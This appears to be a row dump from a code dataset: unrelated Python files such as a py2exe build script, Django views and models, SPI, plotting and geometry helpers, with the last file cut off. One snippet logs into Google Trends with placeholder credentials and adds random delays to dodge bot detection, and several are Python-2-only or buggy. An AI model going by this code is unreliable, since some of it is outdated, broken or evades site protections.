text stringlengths 8 6.05M |
|---|
import os
import sys
import shutil
import py2exe
import argparse
import subprocess
import compileall
from distutils.core import setup
from zipfile import ZipFile
# Command-line interface: each flag selects one of the build/maintenance
# steps defined below (clean/pack/build/make).
parser = argparse.ArgumentParser(description='Emmaus House Food Pantry Setup')
parser.add_argument('-c', '--clean', action='store_true',
                    default=False, help='Clean all built files.')
parser.add_argument('-p', '--pack', action='store_true',
                    default=False, help='Pack app files into archive.')
parser.add_argument('-b', '--build', action='store_true',
                    default=False, help='Build executable.')
parser.add_argument('-m', '--make', action='store_true',
                    default=False, help='Make fresh database file.')
def clean():
    """Delete every generated artifact: archive, build output dirs, log."""
    targets = [
        ('./emmaus_house_food_pantry.zip', 'archive', os.remove),
        ('./build', 'directory', shutil.rmtree),
        ('./dist', 'directory', shutil.rmtree),
        ('./django.log', 'log', os.remove),
    ]
    for path, kind, remover in targets:
        if os.path.exists(path):
            print('Removing %s: %s ...' % (kind, path))
            remover(path)
def make():
    """Create a fresh pantry.db via Django syncdb and load the seed fixture."""
    import settings
    # Database creation must run against the normal (non-frozen) settings.
    if settings.STANDALONE:
        raise Exception('STANDALONE setting True while making database')
    if os.path.exists('./pantry.db'):
        print 'Removing previous database: ./pantry.db ...'
        os.remove('./pantry.db')
    print 'Creating new database ...'
    # NOTE(review): passing the command as one string assumes Windows
    # ("python.exe"); on POSIX this would need shell=True or an argv list.
    subprocess.check_call('python.exe manage.py syncdb --noinput')
    print 'Loading data in new database ...'
    subprocess.check_call('python.exe manage.py loaddata data\\initial_v2.json')
def pack():
    """Byte-compile the sources and zip the tree (minus .git) into the app archive."""
    if not os.path.exists('./pantry.db'):
        raise Exception('Missing database file: ./pantry.db')
    print('Compiling python files ...')
    compileall.compile_dir('.', force=True)
    print('Composing list of files for archive ...')
    files = [os.path.join(dirpath, filename)
             for dirpath, dirnames, filenames in os.walk(".")
             if not dirpath.startswith('.\\.git')
             for filename in filenames]
    print('Creating archive file ...')
    with ZipFile('emmaus_house_food_pantry.zip', 'w') as food_pantry_zip:
        for entry in files:
            food_pantry_zip.write(entry)
def build():
    """Embed the packed archive as a Win32 resource and build the exe with py2exe."""
    import settings
    # The frozen executable must run with STANDALONE settings enabled.
    if not settings.STANDALONE:
        raise Exception('STANDALONE setting False while building webapp')
    print 'Reading archive into memory ...'
    with open('./emmaus_house_food_pantry.zip', 'rb') as food_pantry_zip:
        food_pantry_data = food_pantry_zip.read()
    print 'Invoking py2exe to generate the executable ...'
    # Modules excluded to keep the bundled executable small.
    excludes = ['pywin', 'pywin.debugger', 'pywin.debugger.dbgcon',
                'pywin.dialogs', 'pywin.dialogs.list', 'Tkconstants',
                'Tkinter', 'tcl', 'zmq', 'Pythonwin', 'IPython', 'MySQLdb',
                'PIL', 'matplotlib', 'nose', 'numpy', 'pyreadline', 'scipy',
                'win32', 'win32com']
    # distutils setup() reads argv; fake "setup.py py2exe" regardless of
    # how this script itself was invoked.
    sys.argv[1:] = ['py2exe']
    # The zip archive is attached to the exe as a custom resource named
    # FOOD_PANTRY_DATA so the app can unpack itself at runtime.
    setup(windows=[{'script': 'webapp.py',
                    'other_resources':
                        [(u'FOOD_PANTRY_DATA', 1, food_pantry_data)]}],
          options = {'py2exe': {'bundle_files': 1,
                                'dll_excludes': ['w9xpopen.exe', 'MSVCP90.dll',
                                                 'mswsock.dll', 'powrprof.dll'],
                                'excludes': excludes,
                                'packages': ['django', 'email', 'win32api',
                                             'cherrypy', 'appdirs']}},
          zipfile = None)
if __name__ == '__main__':
    # Run the selected steps; flags are independent and may be combined.
    args = parser.parse_args()
    if args.clean: clean()
    if args.pack: pack()
    if args.build: build()
    if args.make: make()
else:
    # When imported as a module, expose an `args` object whose every
    # attribute is None so the functions above can still be called manually.
    class DummyArgs:
        def __getattr__(self, field):
            return None
    args = DummyArgs()
|
import spidev
import time

# Continuously clock a dummy byte over SPI bus 0, device 0 and print the
# byte(s) received in return (simple loopback/probe script, Python 2).
spi = spidev.SpiDev()
spi.open(0,0)
spi.max_speed_hz=16000000 #16MHz
#spi.max_speed_hz=32000000 #32MHz
while True:
    #resp = spi.xfer2( [0x80, 0xFF] )
    # xfer2 is a full-duplex transfer: send 0xFF, capture whatever comes back.
    resp = spi.xfer2( [0xFF] )
    print resp
    #print "r2"+resp[1]
    time.sleep(1)  # poll once per second
|
import sys
import argparse
from misc.Logger import logger
from core.base import base
from misc import Misc
class env(base):
    """Second-level CLI module handling `kerrigan.py env <command>` calls."""

    def __init__(self, global_options=None):
        # Usage text inherited from the top-level parser, appended to ours.
        self.global_options = global_options
        logger.info('Env module entry endpoint')
        self.cli = Misc.cli_argument_parse()

    def start(self):
        """Dispatch sys.argv[2] to the method of the same name, or exit(1)."""
        logger.info('Invoked starting point for env')
        parser = argparse.ArgumentParser(description='ec2 tool for devops', usage='''kerrigan.py env <command> [<args>]
Second level options are:
check
''' + self.global_options)
        parser.add_argument('command', help='Command to run')
        # Only the sub-command token itself is parsed here.
        args = parser.parse_args(sys.argv[2:3])
        if not hasattr(self, args.command):
            logger.error('Unrecognized command')
            parser.print_help()
            exit(1)
        getattr(self, args.command)()

    def check(self):
        # FIXME this whole is broken, and should be dynamic
        # NOTE(review): the parser below is built but never parses anything;
        # the command is incomplete as acknowledged by the FIXME above.
        logger.info("Doing config check in AWS")
        parser = argparse.ArgumentParser(description='ec2 tool for devops', usage='''kerrigan.py env check [<args>]]
''' + self.global_options)
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
def draw(x, y, Edges):
    """Scatter the nodes and draw every edge as a black line segment."""
    plt.scatter(x, y)
    for e in Edges:
        i, j = e[0], e[1]
        plt.plot([x[i], x[j]], [y[i], y[j]], 'k-')
    plt.show()
def drawRegret(x, y, Edges):
    """Scatter the nodes group-by-group, one rainbow color per group."""
    palette = cm.rainbow(np.linspace(0, 1, len(Edges)))
    for color, group in zip(palette, Edges):
        for node in group:
            plt.scatter(x[node], y[node], color=color)
    plt.show()
|
from pytrends.pyGTrends import pyGTrends
import time
from random import randint

# SECURITY(review): credentials are hard-coded in source; move them to
# environment variables or a config file before committing/sharing.
google_username = "an_email@gmail.com"
google_password = "password"
path = ""
# connect to Google
connector = pyGTrends(google_username, google_password)
# make request
connector.request_report("Pizza")
# wait a random amount of time between requests to avoid bot detection
time.sleep(randint(5, 10))
# download file
connector.save_csv(path, "pizza")
# get suggestions for keywords
keyword = "milk substitute"
data = connector.get_suggestions(keyword)
print(data)
|
from django.db import models
from recurrence.fields import RecurrenceField
class Course(models.Model):
    """A course with a recurring meeting schedule (django-recurrence)."""
    # Human-readable course name.
    title = models.CharField(max_length=100)
    # Recurrence rule set (e.g. weekly meetings) stored by django-recurrence.
    schedule = RecurrenceField()
|
from AlgebraicDataType import ADT
def nt_to_tuple(nt):
    """Return the field values of a namedtuple-like object as a plain tuple."""
    field_names = nt.__class__._fields
    return tuple(getattr(nt, name) for name in field_names)
class PatternMatchBind(object):
    """Pattern node that binds the matched value to *name* in the env dict."""

    def __init__(self, name):
        # Variable name the matched value will be bound to.
        self.name = name
class PatternMatchListBind(object):
    """Pattern node splitting a sequence into a head pattern and a tail pattern."""

    def __init__(self, head, tail):
        # Pattern for the leading elements.
        self.head = head
        # Pattern for the remainder of the sequence.
        self.tail = tail
def pattern_match(value, pattern, env=None):
    """Match *value* against *pattern*, extending the binding environment.

    value: arbitrary object (ADT instance, sequence, or literal)
    pattern: PatternMatchBind / PatternMatchListBind / ADT / sequence / literal
    env: existing name->value bindings (a fresh dict when None)

    Returns (matched, env); env contains all bindings made so far, even on a
    failed match. Raises SyntaxError when a name would be bound twice.
    """
    env = {} if env is None else env
    if isinstance(pattern, PatternMatchBind):
        if pattern.name in env:
            # FIX: the original used "{}" % name, which raises TypeError
            # ("not all arguments converted") instead of this SyntaxError.
            raise SyntaxError("Conflicting definitions: {}".format(pattern.name))
        env[pattern.name] = value
        return True, env
    elif isinstance(pattern, PatternMatchListBind):
        # Split the value to mirror the head/tail structure of the pattern.
        head, tail = list(value[:len(pattern.head)]), value[len(pattern.head):]
        matches, env = pattern_match(head, pattern.head, env)
        if matches:
            return pattern_match(tail, pattern.tail, env)
        return False, env
    elif type(value) == type(pattern):
        if isinstance(value, ADT):
            # Compare ADTs field-by-field as tuples.
            return pattern_match(nt_to_tuple(value), nt_to_tuple(pattern), env)
        elif hasattr(value, "__iter__"):
            # Sequences match element-wise and must have equal length.
            matches = []
            if len(value) != len(pattern):
                return False, env
            for v, p in zip(value, pattern):
                match_status, env = pattern_match(v, p, env)
                matches.append(match_status)
            return all(matches), env
        elif value == pattern:
            return True, env
    return False, env
|
from time import time
def my_dec(func):
    """Decorator that prints how long each call to *func* takes.

    Returns a wrapper with the same signature and return value as *func*.
    """
    import functools

    # FIX: functools.wraps preserves the wrapped function's __name__ and
    # docstring (the original wrapper masked them as "wrapper").
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        t1 = time()
        res = func(*args, **kwargs)
        t2 = time()
        t3 = t2 - t1
        print(f'It took {t3} seconds')
        return res
    return wrapper
@my_dec
def my_own_range(num, start=0):
    """Return [start+1, start+2, ..., num] built with an explicit while loop."""
    collected = []
    while start < num:
        start += 1
        collected.append(start)
    return collected
@my_dec
def py_range(n):
    """Return [0, 1, ..., n-1] as a list (timed via my_dec)."""
    return list(range(n))
# Compare the two range implementations on one million elements; each call
# prints its own timing via the my_dec decorator.
l1 = py_range(1000000)
l2 = my_own_range(1000000)

@my_dec
def generator(num):
    # NOTE(review): decorating a generator function times only the creation
    # of the generator object, not the iteration — the printed time is near
    # zero regardless of num.
    for i in range(num):
        yield i

n = generator(10)
print(next(n))
print(next(n))
print(next(n))
|
import numpy as np
class ColorPalette:
    """Fixed RGB color table with random fallback colors beyond its length."""

    def __init__(self, numColors):
        # Seed so any randomly generated padding colors are reproducible.
        np.random.seed(1)
        self.colorMap = np.array([[255, 0, 0],
                                  [50, 150, 0],
                                  [0, 0, 255],
                                  [80, 128, 255],
                                  [255, 230, 180],
                                  [255, 0, 255],
                                  [0, 255, 255],
                                  [255, 255, 0],
                                  [0, 255, 0],
                                  [200, 255, 255],
                                  [255, 200, 255],
                                  [100, 0, 0],
                                  [0, 100, 0],
                                  [128, 128, 80],
                                  [0, 50, 128],
                                  [0, 100, 100],
                                  [0, 255, 128],
                                  [0, 128, 255],
                                  [255, 0, 128],
                                  [128, 0, 255],
                                  [255, 128, 0],
                                  [128, 255, 0],
                                  ], dtype=np.uint8)
        # Duplicate the table once, then pad with random colors if still short.
        self.colorMap = np.concatenate([self.colorMap, self.colorMap], axis=0)
        if numColors > self.colorMap.shape[0]:
            self.colorMap = np.concatenate(
                [self.colorMap,
                 np.random.randint(255, size=(numColors, 3), dtype=np.uint8)],
                axis=0)

    def getColorMap(self):
        """Return the full (N, 3) uint8 color table."""
        return self.colorMap

    def getColor(self, index):
        """Return the RGB color at *index*; a random color if out of range."""
        # FIX: the original referenced bare `colorMap` (NameError at runtime);
        # the attribute lives on self.
        if index >= self.colorMap.shape[0]:
            return np.random.randint(255, size=(3), dtype=np.uint8)
        else:
            return self.colorMap[index]
def intersectFaceLine(face, line, return_ratio=False):
    """Test whether segment *line* crosses the planar polygon *face*.

    face: list of 3D vertices (np.array of float), assumed planar and convex
    line: [p0, p1] segment endpoints (np.array of float)
    return_ratio: also return alpha, the crossing position along the segment
        (0 at line[0], 1 at line[1])

    Returns bool, or (bool, alpha) when return_ratio is True.
    """
    faceNormal = np.cross(face[1] - face[0], face[2] - face[0])
    # Polygon area from the triangle fan anchored at face[0].
    faceArea = 0
    for c in range(1, len(face) - 1):  # FIX: xrange is Python-2-only
        faceArea += np.linalg.norm(np.cross(face[c] - face[0], face[c + 1] - face[c])) / 2
    # Normalize the normal (|cross| of the fan equals 2*area); the 1e-4 floor
    # guards against division by zero for degenerate faces.
    faceNormal /= np.maximum(faceArea * 2, 1e-4)
    faceOffset = np.sum(faceNormal * face[0])
    offset_1 = np.sum(faceNormal * line[0])
    offset_2 = np.sum(faceNormal * line[1])
    # Segment parallel to the face plane: no single crossing point.
    if offset_2 == offset_1:
        if return_ratio:
            return False, 0
        else:
            return False
    alpha = (faceOffset - offset_1) / (offset_2 - offset_1)
    # The crossing must lie strictly inside the segment.
    if alpha <= 0 or alpha >= 1:
        if return_ratio:
            return False, alpha
        else:
            return False
    point = line[0] + alpha * (line[1] - line[0])
    # Point-in-polygon test: the triangle areas around the point sum to the
    # face area exactly when the point is inside (small float tolerance).
    intersectionArea = 0
    for c in range(len(face)):  # FIX: xrange is Python-2-only
        intersectionArea += np.linalg.norm(np.cross(point - face[c], point - face[(c + 1) % len(face)])) / 2
    if intersectionArea <= faceArea + 1e-4:
        if return_ratio:
            return True, alpha
        else:
            return True
    else:
        if return_ratio:
            return False, alpha
        else:
            return False
if __name__ == '__main__':
    # Smoke test: a vertical segment against a quadrilateral lying in the
    # z = 0.0634 plane; prints the inputs and the (hit, alpha) result.
    line = [np.array([ 2.4764291 , 4.37349266, -9.5168555 ]), np.array([ 2.4764291 , 4.37349266, 10.4831445 ])]
    face = [np.array([2.1361478 , 0.01942726, 0.06335368]), np.array([8.41647591, 2.27955277, 0.06335368]), np.array([6.15570054, 8.74293862, 0.06335368]), np.array([-0.12478519, 6.48326369, 0.06335368])]
    intersection, ratio = intersectFaceLine(face, line, return_ratio=True)
    print(face)
    print(line)
    print(intersection, ratio)
    exit(1)
|
from django.http import HttpResponse
import simplejson
import logging
from v1_meta import V1Meta
from datetime import datetime
import xml.etree.cElementTree as ET
from defects.v1defect import V1Defect
from django.shortcuts import render
# Create your views here.
def GetDefectsNumber(request):
    """Aggregate VersionOne defect counts per module and resolution bucket.

    Responds with a JSON object mapping '<module>_unres', '<module>_in_testing'
    and '<module>_res' to the number of qualifying defects (P1/P2, regressions,
    or P3 'New' defects with a listed configuration type).
    """
    t1 = datetime.now()
    # Module short name -> VersionOne scope (project) id.
    modules = {'pmr': '454039', 'pmt': '567434', 'mtr': '567436', 'scm': '611410', 'vrp': '611415', 'cal': '805607',
               'tgm': '567435', 'cmp': '551644', 'pe': '294215'}
    # Suffixes for the three counters kept per module.
    status = ['_unres', '_in_testing', '_res']
    fields = ['SecurityScope', 'Custom_SLA2.Name', 'Type.Name', 'Custom_ConfigurationType.Name', 'Status.Name']
    p1p2 = ['P1', 'P2']
    cfg_type = ['Universal (Universal features require 30 days pre-notice.)', 'Admin Opt-out', 'Provisioning Opt-out']
    in_testing = ['Dev Complete', 'In Testing']
    # Positional index of each selected field within the returned asset nodes,
    # discovered from the first asset below.
    attr_type = {'type': 0, 'config': 0, 'sla': 0, 'status': 0, 'project': 0, 'project.name': 0 }
    some_data = {}
    scope = ''
    sel = ''
    # NOTE(review): iterkeys/itervalues/iteritems make this Python-2-only code.
    for each_module in modules.iterkeys():
        for module in status:
            some_data[each_module + module] = 0
    # Build the OR'ed ("...|...") scope filter covering every module.
    for scope_id in modules.itervalues():
        if scope == '':
            scope = "SecurityScope='Scope:" + scope_id + "'"
        else:
            scope = scope + '|' + "SecurityScope='Scope:" + scope_id + "'"
    # Comma-separated field selection for the REST query.
    for field in fields:
        if sel == '':
            sel = field
        else:
            sel = sel + ',' + field
    v1 = V1Meta()
    query = v1.url + "/rest-1.v1/Data/Defect?Sel=" + sel + "&Where=" + scope
    dom = v1.get_xml(query)
    doc = ET.fromstring(dom)
    root = doc
    # Map attribute names to child positions using the first asset node.
    for node_attribute in range(0, 6, 1):
        if root[0][node_attribute].attrib['name'] == 'Type.Name':
            attr_type['type'] = node_attribute
        if root[0][node_attribute].attrib['name'] == 'Custom_ConfigurationType.Name':
            attr_type['config'] = node_attribute
        if root[0][node_attribute].attrib['name'] == 'Custom_SLA2.Name':
            attr_type['sla'] = node_attribute
        if root[0][node_attribute].attrib['name'] == 'Status.Name':
            attr_type['status'] = node_attribute
        if root[0][node_attribute].attrib['name'] == 'SecurityScope':
            attr_type['project'] = node_attribute
        if root[0][node_attribute].attrib['name'] == 'SecurityScope.Name':
            attr_type['project.name'] = node_attribute
    for node_asset in root:
        # Resolve the asset's module key from its scope id.
        for module in modules.iteritems():
            if node_asset[attr_type['project']][0].attrib['idref'].split(':')[1] == module[1]:
                module_key = module[0]
        # NOTE(review): module_key stays unbound if no scope matched — the
        # classification below would then raise NameError; confirm intended.
        if node_asset[attr_type['sla']].text in p1p2 \
                or node_asset[attr_type['type']].text == 'Regression' \
                or (node_asset[attr_type['sla']].text == 'P3' and node_asset[attr_type['type']].text == 'New' and node_asset[
                    attr_type['config']].text in cfg_type):
            if node_asset[attr_type['status']].text == 'Done':
                some_data[module_key + '_res'] += 1
            elif node_asset[attr_type['status']].text in in_testing:
                some_data[module_key + '_in_testing'] += 1
            else:
                some_data[module_key + '_unres'] += 1
    t2 = datetime.now()
    logging.error("Timer for defect report function\nTotal time spent: " + str((t2 - t1).seconds) + " seconds.")
    data = simplejson.dumps(some_data)
    # NOTE(review): 'mimetype' was removed in Django 1.7; modern Django needs
    # content_type= instead — confirm the targeted Django version.
    return HttpResponse(data, mimetype='application/json')
def DefectDetails(request):
    """Render the defect-detail page for one module and one status bucket.

    Expects GET parameters 'module' (key of *modules*) and 'status' (key of
    *status_mapping*); fetches matching VersionOne defects and renders them
    via defectdetails.html.
    """
    parameters = {}
    # NOTE(review): iteritems/encode make this Python-2-only code.
    for para in request.GET.iteritems():
        parameters[para[0].encode('utf-8')] = para[1].encode('utf-8')
    print parameters
    # Module short name -> VersionOne scope (project) id.
    modules = {'pmr': '454039', 'pmt': '567434', 'mtr': '567436', 'scm': '611410', 'vrp': '611415', 'cal': '805607',
               'tgm': '567435', 'cmp': '551644', 'pe': '294215'}
    status_list = ['_unres', '_in_testing', '_res']
    fields = ['ID.Name', 'ID.Number', 'SecurityScope.Name', 'Status.Name', 'Timebox.Name', 'SecurityScope', 'Custom_SLA2.Name', 'Type.Name', 'Custom_ConfigurationType.Name', 'Owners.Name']
    # attr_type = {'status': 0, 'project': 0, 'sprint': 0}
    # Request-level status bucket -> raw VersionOne status names.
    status_mapping = {
        'Unresolved': ['None', 'No Requirements', 'Requirements Done', 'Planned', 'In Progress', 'Awaiting Clarification', 'Awaiting Code Fix', 'Blocked', 'Reopened'],
        'In Testing': ['Dev Complete', 'In Testing'],
        'Closed': ['Done']
    }
    p1p2 = ['P1', 'P2']
    cfg_type = ['Universal (Universal features require 30 days pre-notice.)', 'Admin Opt-out', 'Provisioning Opt-out']
    scope = ''
    sel = ''
    backlogItems = {}
    defect_list = []
    v1_id = ''
    # setup scope for all modules
    # for scope_id in modules.itervalues():
    #     if scope == '':
    #         scope = "SecurityScope='Scope:" + scope_id + "'"
    #     else:
    #         scope = scope + '|' + "SecurityScope='Scope:" + scope_id + "'"
    # single scope from request
    scope = "SecurityScope='Scope:" + modules[str(parameters['module']).lower()] + "'"
    # Comma-separated field selection for the REST query.
    for field in fields:
        if sel == '':
            sel = field
        else:
            sel = sel + ',' + field
    v1 = V1Meta()
    query = v1.url + "/rest-1.v1/Data/Defect?Sel=" + sel + "&Where=" + scope
    print query
    dom = v1.get_xml(query)
    doc = ET.fromstring(dom)
    root = doc
    # Collect each asset's selected attributes into backlogItems[id].
    for node_asset in root:
        id = node_asset.attrib['id'].split(':')[1]
        backlogItems[id] = {}
        for node_attribute in node_asset:
            for attr in fields:
                if node_attribute.attrib['name'] == attr:
                    node_value = node_attribute.find('Value')
                    if node_value != None:
                        # Multi-valued attributes: keep only the first token.
                        backlogItems[id][attr] = node_value.text.split(" ")[0]
                    else:
                        backlogItems[id][attr] = node_attribute.text
        backlogItems[id]['oid'] = node_asset.attrib['id']
    # Unpack each item's attributes and keep the ones matching the filter.
    for item in backlogItems.iteritems():
        for i in item[1].iteritems():
            if i[0] == 'ID.Number':
                v1_id = str(i[1])
            elif i[0] == 'ID.Name':
                try:
                    title = str(i[1])
                except Exception:
                    # Non-ASCII titles cannot be str()'d under Python 2.
                    title = "=== ASCII character detected, please modify the title!!! ==="
            elif i[0] == 'Timebox.Name':
                sprint = str(i[1]).replace(' ', '')
            elif i[0] == 'Status.Name':
                status = str(i[1])
            elif i[0] == 'oid':
                oid = str(i[1])
            elif i[0] == 'SecurityScope.Name':
                # Module abbreviation is the text between parentheses.
                start = str(i[1]).find('(')+1
                end = str(i[1]).find(')')
                module = str(i[1])[start:end]
            elif i[0] == 'Custom_SLA2.Name':
                sla = str(i[1])
            elif i[0] == 'Type.Name':
                type = str(i[1])
            elif i[0] == 'Custom_ConfigurationType.Name':
                configType = str(i[1])
            elif i[0] == 'Owners.Name':
                owner = str(i[1])
        # Same qualification rule as GetDefectsNumber: P1/P2, regressions,
        # or P3 'New' defects with a listed configuration type.
        if status in status_mapping[parameters['status']]:
            if sla in p1p2 \
                    or type == 'Regression' \
                    or (sla == 'P3' and type == 'New' and configType in cfg_type):
                custom_status = parameters['status']
                if configType == cfg_type[0]:
                    configType = configType.split(" ")[0]
                v1_tmp = V1Defect(v1_id=v1_id, oid=oid, title=title, custom_status=custom_status, module=module, sprint=sprint, status=status, sla=sla, type=type, configType=configType, owner=owner)
                defect_list.append(v1_tmp)
    return render(request, 'defectdetails.html', {'items': defect_list})
|
import matplotlib.pyplot as pl
import numpy as np

# Plot a recorded control-system response from angular_data.txt: the first
# token is treated as the setpoint, the rest as the feedback samples.
f = open('angular_data.txt','r')
# NOTE(review): this shadows the builtin str for the rest of the script.
str = f.read()
data = str.split();
desired = []
# Repeat the setpoint (first token) so it can be plotted as a flat line.
for i in range(len(data)-1):
    desired.append(data[0])
feedback = data[1:len(data)]
t = np.arange(0,len(feedback),1)
xlimit = len(feedback)-1
# NOTE(review): data holds strings, so max() compares lexicographically and
# the plotted series are strings too — confirm values should be float()'d.
ylimit = int(max(data))+1000
pl.plot(t,feedback,'r')
pl.plot(t,desired,'b')
pl.title('system response')
pl.xlabel('time')
pl.ylabel('angular velocity')
pl.axis([0, xlimit, 0, ylimit])
pl.show()
|
# Print the n-th element of the sequence 1, 2, 3, 5, 8, ... (Fibonacci-like,
# seeded with 1 and 2), where n is read from stdin (1-based).
n = int(input())
seq = [1, 2]
for idx in range(2, n + 1):
    seq.append(seq[idx - 1] + seq[idx - 2])
print(seq[n - 1])
|
import csv

# Rows to persist: each inner list becomes one CSV line.
# FIX: the original was missing the comma after the first row, which made
# "[1, 'a', 1.1] [2, 'b', 1.2]" an indexing expression (TypeError).
data = [[1, "a", 1.1],
        [2, "b", 1.2],
        [3, "c", 1.3]]

# newline='' stops the csv module from emitting blank lines on Windows.
with open("output.csv", "w", newline="") as f:
    wr = csv.writer(f)
    for row in data:
        # FIX: the original dropped the closing parenthesis (SyntaxError).
        wr.writerow(row)
import numpy as np
import cv2

# Image contours: lines connecting points of equal value.
# Apply thresholding or Canny edge detection before looking for contours;
# the objects of interest must be white and the background black.
def contour():
    """Find and draw the contours of images/globe.jpg in red."""
    img = cv2.imread('images/globe.jpg')
    imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Binarize the grayscale image at 127.
    ret, thr = cv2.threshold(imgray, 127, 255, 0)
    # NOTE(review): the 3-value unpacking matches the OpenCV 3.x API;
    # OpenCV 4.x findContours returns only (contours, hierarchy) — confirm.
    _, contours, _ = cv2.findContours(thr, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # Arguments: source binary image; retrieval mode; approximation method.
    # Retrieval modes:
    #   RETR_EXTERNAL: only the outermost contours
    #   RETR_LIST: all contours, no hierarchy relationships
    #   RETR_CCOMP: all contours in a 2-level hierarchy
    #     (level 1 = outer boundaries, level 2 = hole boundaries)
    #   RETR_TREE: all contours with the full hierarchy tree
    # Approximation methods:
    #   CHAIN_APPROX_NONE: store every contour point
    #   CHAIN_APPROX_SIMPLE: drop redundant points along horizontal,
    #     vertical and diagonal runs, keeping only the end points
    #     (e.g. a rectangle keeps just its 4 corners)
    #   CHAIN_APPROX_TC89_*: Teh-Chin chain approximation algorithms
    # Draw all contours (-1 = every index) in red (BGR), line thickness 1.
    cv2.drawContours(img, contours, -1, (0, 0, 255), 1)
    cv2.imshow('thresh', thr)
    cv2.imshow('contour', img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

contour()
|
import socket

# Minimal TCP client (Python 2): connect to localhost:8000, send one line,
# print up to 100 bytes of the reply, then close.
clisock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
# Empty host string means the local host for connect().
clisock.connect( ('', 8000) )
clisock.send("Hi I am the client\n")
print clisock.recv(100)
clisock.close()
|
# %%
# FIX: "from myApp.models import Grades.Students, Grades" is a SyntaxError —
# dotted names cannot follow "import" in a from-import. Presumably both
# models were wanted; TODO confirm the intended model names.
from myApp.models import Students, Grades
from django.utils import timezone
# FIX: the module name was misspelled "datatime"; star-import kept as written.
from datetime import *
# %%
|
import sklearn.linear_model
from sklearn import svm
import numpy as np
class SVM:
    """Thin wrapper around sklearn's SVC with a 5-class evaluation helper."""

    def __init__(self, C=1.0, kernel='linear'):
        # Positional arguments map to SVC(C=..., kernel=...).
        self.svm = svm.SVC(C, kernel)

    def learn(self, X, T):
        """Fit the underlying SVC on samples X with labels T."""
        self.svm.fit(X, T)

    def predict(self, X, T):
        """Evaluate per-class counts over samples X with true labels T.

        Returns (correct_total, n_samples, correct_per_class,
        actual_per_class, predicted_per_class) for the 5 classes 0..4.
        """
        count = 0
        presission = [0, 0, 0, 0, 0]  # correct predictions per class
        recall = [0, 0, 0, 0, 0]      # predicted count per class
        ans = [0, 0, 0, 0, 0]         # true-label count per class
        for i in range(len(X)):  # FIX: xrange is Python-2-only
            # FIX: predict once per sample instead of up to 6 times
            # (SVC.predict is deterministic, so behavior is unchanged).
            prediction = self.svm.predict(X[i])[0]
            for j in range(5):
                if prediction == j:
                    recall[j] += 1
                    if T[i] == j:
                        presission[j] += 1
            if T[i] == prediction:
                count += 1
            for h in range(5):
                if T[i] == h:
                    ans[h] += 1
                    break
        return count, len(X), presission, ans, recall
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Extract the second whitespace-separated column (the score) from each line
# of the file given as argv[1] and write the scores, space-separated, to
# scores.txt.
import sys, operator, math
from sys import argv

with open(argv[1], 'r') as f:
    with open('scores.txt','w') as fScores:
        for line in f:
            # Each input line is expected as "<word> <score>".
            wordScore = line.split()
            score = wordScore[1]
            fScores.write(score + ' ')
|
# Echo everything after the first '.' in the input line
# (raises ValueError when there is no dot, as before).
text = input()
dot_pos = text.index(".")
print(text[dot_pos + 1:])
import numpy as np
import matplotlib.pyplot as plt
from src.shaft_secant_piles import plot_cylinder_2points, set_axis_equal_3d
def get_parameters_wall_secant_piles(D, a, L, H_drilling_platform, v=0.75):
    """Derive geometric parameters of a secant-piled wall.

    D: pile diameter [m]
    a: C/C pile spacing between two neighboring piles [m]
    L: pile length [m]
    H_drilling_platform: height of drilling platform above top of piles [m]
    v: percentage of verticality [%]

    Returns (t_top, d_top, x0, x, t_eff, d_eff):
    interlock and overlapped thickness at the top, deviations at top and
    base, and effective interlock / overlapped thickness at the toe
    (NaN when the wall opens up).
    """
    # Drilling deviation accumulated above the pile head and down its length.
    x0 = H_drilling_platform * v / 100
    x = x0 + L * v / 100
    # Overcut (interlock) and overlapped thickness at the top of the wall.
    t_top = D - a - 2 * x0
    d_top = 2 * np.sqrt((D / 2) ** 2 - (a / 2) ** 2)
    # Effective interlock at the toe; a non-positive value means no overlap.
    t_eff = t_top - 2 * x
    if t_eff > 0:
        d_eff = 2 * np.sqrt((D / 2) * t_eff - (t_eff / 2) ** 2)
    else:
        d_eff = np.nan
    return t_top, d_top, x0, x, t_eff, d_eff
def plot_wall_secant_piles_2items(a, D, dev_0=0.0, dev=0.0, wall_name='Wall'):
    """Plot two neighboring secant piles (plan view) at wall top and base.

    a: C/C pile spacing [m]; D: pile diameter [m]
    dev_0 / dev: worst-case drilling deviation at top / base of piles [m]
    Returns the matplotlib Figure with two subplots (top, base).
    """
    x = np.array([D/2, D/2 + a])
    y = np.zeros_like(x)
    pile_types = ['primary', 'secondary']
    pile_colors = ['white', 'white']
    fig, ax = plt.subplots(2, 1)
    # Worst case: piles lean toward each other at the top...
    x0 = np.array([x[0] + dev_0, x[1] - dev_0]) # x top
    y0 = y
    # ...and away from each other at the base. NOTE: x is mutated in place,
    # so x0 must be computed before these two lines.
    x[0] = x[0] - dev # x bottom
    x[1] = x[1] + dev # x bottom
    # top of shaft: even indices are primary piles, odd indices secondary
    for i in range(0,len(x),2):
        circle_p = plt.Circle((x0[i],y0[i]), D/2, facecolor=pile_colors[0], edgecolor='black', zorder=0, alpha=0.3, label=pile_types[0])
        ax[0].add_patch(circle_p)
    for i in range(1, len(x), 2):
        circle_s = plt.Circle((x0[i],y0[i]), D/2, facecolor=pile_colors[1], edgecolor='black', zorder=0, alpha=0.3, linewidth=2.0, label=pile_types[1])
        ax[0].add_patch(circle_s)
    # bottom of shaft
    for i in range(0,len(x),2):
        circle_p = plt.Circle((x[i],y[i]), D/2, facecolor=pile_colors[0], edgecolor='black', zorder=0, alpha=0.3, label=pile_types[0])
        ax[1].add_patch(circle_p)
    for i in range(1, len(x), 2):
        circle_s = plt.Circle((x[i],y[i]), D/2, facecolor=pile_colors[1], edgecolor='black', zorder=0, alpha=0.3, linewidth=2.0, label=pile_types[1])
        ax[1].add_patch(circle_s)
    ax[0].set_title(wall_name + ' at top (deviation {0:.1f} cm)'.format(dev_0*100))
    ax[1].set_title(wall_name + ' at base (deviation {0:.1f} cm)'.format(dev*100))
    for axi in ax:
        axi.autoscale_view()
        axi.set_aspect('equal')
    #ax.legend()
    #handles, labels = plt.gca().get_legend_handles_labels()
    #by_label = OrderedDict(zip(labels, handles))
    #plt.legend(by_label.values(), by_label.keys())
